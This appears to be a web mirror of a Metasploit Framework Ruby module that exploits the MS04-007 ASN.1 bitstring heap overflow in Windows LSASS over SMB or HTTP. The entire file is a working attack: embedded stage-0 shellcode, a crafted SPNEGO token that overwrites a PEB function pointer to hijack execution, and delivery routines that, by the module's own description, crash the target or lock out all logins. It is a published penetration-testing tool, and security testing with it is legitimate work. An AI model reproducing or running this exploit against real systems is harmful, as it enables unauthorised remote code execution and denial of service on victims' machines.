Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms04_007_killbill.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = LowRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',

16
        'Description' => %q{

17
          This is an exploit for a previously undisclosed

18
          vulnerability in the bit string decoding code in the

19
          Microsoft ASN.1 library. This vulnerability is not related

20
          to the bit string vulnerability described in eEye advisory

21
          AD20040210-2. Both vulnerabilities were fixed in the

22
          MS04-007 patch.  Windows 2000 SP4 Rollup 1 also patches this

23
          vulnerability.

24


25
          You are only allowed one attempt with this vulnerability. If

26
          the payload fails to execute, the LSASS system service will

27
          crash and the target system will automatically reboot itself

28
          in 60 seconds. If the payload succeeds, the system will no

29
          longer be able to process authentication requests, denying

30
          all attempts to login through SMB or at the console. A

31
          reboot is required to restore proper functioning of an

32
          exploited system.

33


34
          This exploit has been successfully tested with the win32/*/reverse_tcp

35
          payloads, however a few problems were encountered when using the

36
          equivalent bind payloads. Your mileage may vary.

37
        },

38
        'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],

39
        'License' => BSD_LICENSE,

40
        'References' => [

41
          [ 'CVE', '2003-0818'],

42
          [ 'OSVDB', '3902' ],

43
          [ 'BID', '9633'],

44
          [ 'MSB', 'MS04-007'],

45
        ],

46
        'DefaultOptions' => {

47
          'EXITFUNC' => 'thread'

48
        },

49
        'Privileged' => true,

50
        'Payload' => {

51
          'Space' => 1024,

52
          'StackAdjustment' => -3500,

53
        },

54
        'Platform' => 'win',

55
        'Targets' => [

56
          [

57
            'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)

58
            {

59
              'Platform' => 'win',

60
            },

61
          ],

62
        ],

63
        'Notes' => {

64
          'AKA' => [ 'kill-bill' ],

65
          'Reliability' => [ UNRELIABLE_SESSION ],

66
          'Stability' => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ],

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        },

69
        'DisclosureDate' => '2004-02-10',

70
        'DefaultTarget' => 0

71
      )

72
    )

73


74
    register_options [

75
      OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),

76
    ]

77


78
    deregister_options('SMB::ProtocolVersion')

79
  end

80


81
  # This exploit is too destructive to use during automated exploitation.

82
  # Better Windows-based exploits exist at this time (Sep 2006)

83
  def autofilter

84
    false

85
  end

86


87
  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published

88
  # as a Metasploit Framework module with his permission. This module is only

89
  # licensed under GPLv2, keep this in mind if you embed the Framework into

90
  # a non-GPL application. -hdm[at]metasploit.com

91


92
  def exploit

93
    # The first stage shellcode fixes the PEB pointer and cleans the heap

94
    stage0 =

95
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff" +

96
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2" +

97
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00" +

98
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c" +

99
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89" +

100
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31" +

101
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4" +

102
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24" +

103
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81" +

104
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3" +

105
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31" +

106
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64" +

107
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08" +

108
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74" +

109
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb" +

110
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd" +

111
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46" +

112
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea" +

113
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee" +

114
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +

115
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b" +

116
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2" +

117
      "\x08\x00\xeb\xfe"

118


119
    token = spnego_token(stage0, payload.encoded)

120


121
    case datastore['PROTO']

122
    when 'smb'

123
      exploit_smb(token)

124
    when 'http'

125
      exploit_http(token)

126
    else

127
      print_status("Invalid application protocol specified, use smb or http")

128
    end

129
  end

130


131
  def exploit_smb(token)

132
    connect(versions: [1])

133


134
    client = Rex::Proto::SMB::Client.new(sock)

135


136
    begin

137
      client.session_request(smb_hostname()) if not datastore['SMBDirect']

138
      client.negotiate

139
      client.session_setup_with_ntlmssp_blob(token)

140
    rescue => e

141
      if (e.to_s =~ /error code 0x00050001/)

142
        print_error("The target system has already been exploited")

143
      else

144
        print_error("Error: #{e}")

145
      end

146
    end

147


148
    handler

149
    disconnect

150
  end

151


152
  def exploit_http(token)

153
    connect(versions: [1])

154


155
    req = "GET / HTTP/1.0\r\n"

156
    req << "Host: #{datastore['RHOST']}\r\n"

157
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

158


159
    sock.put(req)

160
    res = sock.get_once

161


162
    if (res and res =~ /0x80090301/)

163
      print_error("This server does not support the Negotiate protocol or has already been exploited")

164
    end

165


166
    if (res and res =~ /0x80090304/)

167
      print_error("This server responded with error code 0x80090304 (wth?)")

168
    end

169


170
    handler

171
    disconnect

172
  end

173


174
  # Returns an ASN.1 encoded string

175
  def enc_asn1(str)

176
    Rex::Proto::NTLM::Utils::asn1encode(str)

177
  end

178


179
  # Returns an ASN.1 encoded bit string with 0 unused bits

180
  def enc_bits(str)

181
    "\x03" + enc_asn1("\x00" + str)

182
  end

183


184
  # Returns a BER encoded constructed bit string

185
  def enc_constr(*str_arr)

186
    "\x23" + enc_asn1(str_arr.join(''))

187
  end

188


189
  # Returns a BER encoded SPNEGO token

190
  def spnego_token(stage0, stage1)

191
    if !(stage0 and stage1)

192
      print_status("Invalid parameters passed to spnego_token")

193
      return

194
    end

195


196
    if (stage0.length > 1032)

197
      print_status("The stage 0 shellcode is longer than 1032 bytes")

198
      return

199
    end

200


201
    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

202


203
    if ((tag.length + stage1.length) > 1033)

204
      print_status("The stage 1 shellcode is too long")

205
      return

206
    end

207


208
    # The first two overwrites must succeed, so we write to an unused location

209
    # in the PEB block. We don't care about the values, because after this the

210
    # doubly linked list of free blocks is corrupted and we get to the second

211
    # overwrite which is more useful.

212


213
    fw = "\xf8\x0f\x01\x00"	# 0x00010ff8

214
    bk = "\xf8\x0f\x01"

215


216
    # The second overwrite writes the address of our shellcode into the

217
    # FastPebLockRoutine pointer in the PEB

218


219
    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

220


221
    bitstring = enc_constr(

222
      enc_bits("A" * 1024),

223
      "\x03\x00",

224
      enc_constr(

225
        enc_bits(tag + stage1 + ("B" * (1033 - (tag + stage1).length))),

226
        enc_constr(enc_bits(fw + bk)),

227
        enc_constr(

228
          enc_bits("CCCC" + peblock + stage0 + ("C" * (1032 - stage0.length))),

229
          enc_constr(

230
            enc_bits("\xeb\x06" + make_nops(6)),

231
            enc_bits("D" * 1040)

232
          )

233
        )

234
      )

235
    )

236


237
    token = "\x60" + enc_asn1( # Application Constructed Object

238
      "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID

239
      "\xa0" + enc_asn1( # NegTokenInit (0xa0)

240
        "\x30" + enc_asn1(

241
          "\xa1" + enc_asn1(

242
            bitstring

243
          )

244
        )

245
      )

246
    )

247


248
    return token

249
  end

250
end

251


252